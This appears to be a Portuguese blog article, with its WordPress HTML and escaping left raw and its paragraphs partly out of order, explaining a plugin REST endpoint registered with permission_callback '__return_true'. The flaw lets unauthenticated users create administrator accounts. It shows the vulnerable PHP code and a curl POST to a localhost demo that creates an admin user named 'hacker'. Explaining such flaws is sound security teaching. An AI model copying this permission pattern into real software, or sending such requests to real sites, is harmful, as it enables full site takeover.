O uso de APIs REST no desenvolvimento de plugins para WordPress trouxe diversas vantagens para integra\u00e7\u00f5es e expans\u00e3o de funcionalidades. No entanto, a m\u00e1 implementa\u00e7\u00e3o de autentica\u00e7\u00e3o e autoriza\u00e7\u00e3o pode introduzir vulnerabilidades cr\u00edticas. Neste artigo, analisamos uma vulnerabilidade comum e extremamente grave em APIs REST de plugins, onde a aus\u00eancia de verifica\u00e7\u00e3o de permiss\u00f5es permite que qualquer pessoa, mesmo sem estar autenticada, crie um usu\u00e1rio administrador no site.<\/p>\n\n\n\n
A falha consiste na exposi\u00e7\u00e3o de um endpoint da API REST sem qualquer controle de autentica\u00e7\u00e3o. Isso ocorre devido ao uso incorreto do par\u00e2metro O endpoint analisado permite a cria\u00e7\u00e3o de usu\u00e1rios no sistema. No entanto, al\u00e9m de criar usu\u00e1rios, ele os cadastra diretamente com a fun\u00e7\u00e3o de administrador, o que oferece controle total do site ao atacante.<\/p>\n\n\n\n O c\u00f3digo abaixo ilustra como o plugin vulner\u00e1vel registra a rota na API REST:<\/p>\n\n\n\n A fun\u00e7\u00e3o Este c\u00f3digo executa a cria\u00e7\u00e3o de um usu\u00e1rio e, sem qualquer verifica\u00e7\u00e3o de privil\u00e9gios, atribui imediatamente o papel de administrador.<\/p>\n\n\n\n A explora\u00e7\u00e3o \u00e9 extremamente simples e pode ser realizada com uma \u00fanica requisi\u00e7\u00e3o HTTP POST.<\/p>\n\n\n\n Exemplo usando Resposta da API:<\/p>\n\n\n\n Ap\u00f3s executar esse comando, o usu\u00e1rio “hacker” com permiss\u00f5es de administrador est\u00e1 criado no site WordPress.<\/p>\n\n\n\n Assista o video demonstra\u00e7\u00e3o:permission_callback<\/code> no momento do registro da rota da API. Quando este par\u00e2metro \u00e9 definido como __return_true<\/code>, o endpoint se torna acess\u00edvel publicamente para qualquer requisi\u00e7\u00e3o, sem exigir que o solicitante esteja logado ou possua qualquer n\u00edvel de permiss\u00e3o.<\/p>\n\n\n\nDetalhes T\u00e9cnicos<\/h2>\n\n\n\n
Registro do Endpoint Vulner\u00e1vel<\/h3>\n\n\n\n
phpCopiarEditar
add_action( 'rest_api_init', function () {\n register_rest_route( 'vapi\/v1', '\/create-user\/', array(\n 'methods' => 'POST',\n 'callback' => 'vapi_create_user_callback',\n 'permission_callback' => '__return_true', \/\/ Acesso p\u00fablico sem restri\u00e7\u00e3o\n ));\n});\n<\/code><\/pre>\n\n\n\n__return_true<\/code> \u00e9 um atalho no WordPress que retorna sempre “true”, o que significa que qualquer pessoa tem permiss\u00e3o para acessar esse endpoint.<\/p>\n\n\n\nFun\u00e7\u00e3o Callback Vulner\u00e1vel<\/h3>\n\n\n\n
phpCopiarEditar
function vapi_create_user_callback( $request ) {\n $username = sanitize_text_field( $request->get_param('username') );\n $password = sanitize_text_field( $request->get_param('password') );\n $email = sanitize_email( $request->get_param('email') );\n\n if ( username_exists( $username ) || email_exists( $email ) ) {\n return new WP_Error( 'user_exists', 'Usu\u00e1rio ou e-mail j\u00e1 existe.', array( 'status' => 400 ) );\n }\n\n $user_id = wp_create_user( $username, $password, $email );\n if ( is_wp_error( $user_id ) ) {\n return new WP_Error( 'create_failed', 'Erro ao criar usu\u00e1rio.', array( 'status' => 500 ) );\n }\n\n $user = new WP_User( $user_id );\n $user->set_role( 'administrator' );\n\n return array(\n 'success' => true,\n 'user_id' => $user_id,\n 'message' => 'Usu\u00e1rio administrador criado com sucesso!'\n );\n}\n<\/code><\/pre>\n\n\n\nDemonstra\u00e7\u00e3o do Ataque<\/h2>\n\n\n\n
curl<\/code>:<\/p>\n\n\n\nrubyCopiarEditar
curl -X POST http:\/\/localhost\/wordpress\/wp-json\/vapi\/v1\/create-user\/ \\\n-d \"username=hacker\" \\\n-d \"password=senha123\" \\\n-d \"email=hacker@exemplo.com\"\n<\/code><\/pre>\n\n\n\njsonCopiarEditar
{\"success\":true,\"user_id\":2,\"message\":\"Usu\u00e1rio administrador criado com sucesso!\"}\n<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n